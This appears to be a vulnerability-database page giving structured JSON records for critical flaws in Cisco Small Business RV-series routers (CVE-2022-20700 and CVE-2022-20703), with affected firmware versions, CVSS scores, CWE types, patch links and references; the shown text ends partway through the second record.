Search

Find a vulnerability

Search criteria

    13 vulnerabilities found for rv160w by cisco

    VAR-202202-0893

    Vulnerability from variot - Updated: 2025-11-18 15:34

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0893",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "cve": "CVE-2022-20700",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2022-20700",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20700",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "psirt@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20700",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20700",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20700",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "psirt@cisco.com",
                "id": "CVE-2022-20700",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20700",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-176",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20700",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20700",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020302",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20700",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "id": "VAR-202202-0893",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2025-11-18T15:34:36.789000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=182686"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Known Exploited Vulnerabilities Detector",
            "trust": 0.1,
            "url": "https://github.com/Ostorlab/KEV "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2022-20700"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20700"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020302"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "date": "2023-05-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "date": "2022-02-10T18:15:09.033000",
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20700"
          },
          {
            "date": "2022-02-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          },
          {
            "date": "2023-05-11T09:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          },
          {
            "date": "2025-10-28T13:58:18.223000",
            "db": "NVD",
            "id": "CVE-2022-20700"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004940"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-176"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0323

    Vulnerability from variot - Updated: 2025-11-18 15:12

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0323",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv340",
            "scope": null,
            "trust": 1.4,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          }
        ],
        "trust": 1.3
      },
      "cve": "CVE-2022-20703",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 7.2,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20703",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.0,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.1,
                "id": "CVE-2022-20703",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "psirt@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20703",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Local",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.4,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20703",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 7.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2022-20703",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "REQUIRED",
                "vectorString": "AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20703",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "ZDI",
                "id": "CVE-2022-20703",
                "trust": 1.4,
                "value": "HIGH"
              },
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20703",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "psirt@cisco.com",
                "id": "CVE-2022-20703",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20703",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-164",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20703",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
